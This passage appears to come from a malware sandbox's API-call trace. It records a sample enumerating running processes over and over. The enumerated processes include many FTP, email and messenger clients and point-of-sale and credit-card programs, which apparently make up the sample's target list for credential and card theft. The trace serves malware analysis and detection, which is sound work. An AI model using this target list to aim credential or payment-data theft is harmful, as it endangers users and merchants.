lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0235.909] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0235.910] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.912] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.913] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0235.915] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0235.916] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0235.917] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0235.955] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0235.957] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0235.958] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0235.960] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0235.961] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0235.963] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0235.964] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0235.969] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0235.970] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0235.972] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0235.973] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0235.974] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0235.976] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0235.977] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0235.979] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0235.980] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0235.984] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0235.986] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0235.987] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0235.989] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0235.990] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0235.992] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0235.993] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0235.995] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0236.049] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0236.051] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0236.053] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0236.055] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0236.057] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0236.058] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0236.063] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0236.065] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0236.066] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0236.068] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0236.070] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0236.161] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0236.162] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0236.164] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0236.166] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0236.167] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0236.169] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0236.171] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0236.172] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0236.174] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0236.175] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0236.177] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0236.179] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0236.180] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0236.182] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0236.183] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0236.326] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0236.328] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0236.329] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0236.331] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0236.332] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0236.334] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0236.335] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0236.337] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0236.338] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0236.340] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.342] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.343] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.345] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0236.346] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0236.348] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.349] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0236.351] CloseHandle (hObject=0x17b0) returned 1 [0236.351] Sleep (dwMilliseconds=0x64) [0236.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0236.491] Process32First (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.493] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0236.494] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0236.496] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.498] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0236.500] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.501] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0236.503] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0236.504] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, 